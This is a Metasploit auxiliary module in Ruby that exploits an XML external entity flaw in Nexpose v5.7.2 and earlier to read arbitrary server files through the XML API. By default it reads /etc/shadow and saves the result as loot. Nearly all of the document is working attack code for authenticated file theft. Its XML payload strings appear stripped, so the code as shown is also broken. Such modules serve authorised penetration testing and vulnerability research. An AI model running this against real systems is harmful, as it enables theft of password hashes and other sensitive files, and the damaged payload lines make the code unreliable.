## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rapid7/nexpose' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Nexpose XXE Arbitrary File Read', 'Description' => %q{ Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number of vectors. This vulnerability can allow an attacker to a craft special XML that could read arbitrary files from the filesystem. This module exploits the vulnerability via the XML API. }, 'Author' => [ 'Brandon Perry ', # Initial discovery and Metasploit module 'Drazen Popovic ', # Independent discovery, alternate vector 'Bojan Zdrnja ' # Independently reported ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ], # Fill this in with the direct advisory URL from Infigo [ 'URL', 'http://www.infigo.hr/in_focus/advisories/' ] ], 'DefaultOptions' => { 'SSL' => true } )) register_options( [ Opt::RPORT(3780), OptString.new('USERNAME', [true, "The Nexpose user", nil]), OptString.new('PASSWORD', [true, "The Nexpose password", nil]), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]) ], self.class) end def run user = datastore['USERNAME'] pass = datastore['PASSWORD'] prot = ssl ? 'https' : 'http' nsc = Nexpose::Connection.new(rhost, user, pass, rport) print_status("Authenticating as: " << user) begin nsc.login report_auth_info( :host => rhost, :port => rport, :sname => prot, :user => user, :pass => pass, :proof => '', :active => true ) rescue print_error("Error authenticating, check your credentials") return end xml = '' xml << '' xml << ']>' xml << '' xml << '' xml << '' xml << '&xxe;' xml << '' xml << '' xml << '' xml << '' xml << '' xml << '' print_status("Sending payload") begin fsa = nsc.execute(xml) rescue print_error("Error executing API call for site creation, ensure the filepath is correct") return end doc = REXML::Document.new fsa.raw_response_data id = doc.root.attributes["site-id"] xml = "" print_status("Retrieving file") begin fsa = nsc.execute(xml) rescue nsc.site_delete id print_error("Error retrieving the file.") return end doc = REXML::Document.new fsa.raw_response_data print_status("Cleaning up") begin nsc.site_delete id rescue print_warning("Error while cleaning up site ID, manual cleanup required!") end unless doc.root.elements["//host"] print_error("No file returned. Either the server is patched or the file did not exist.") return end path = store_loot('nexpose.file','text/plain', rhost, doc.root.elements["//host"].first.to_s, "File from Nexpose server #{rhost}") print_good("File saved to path: " << path) end end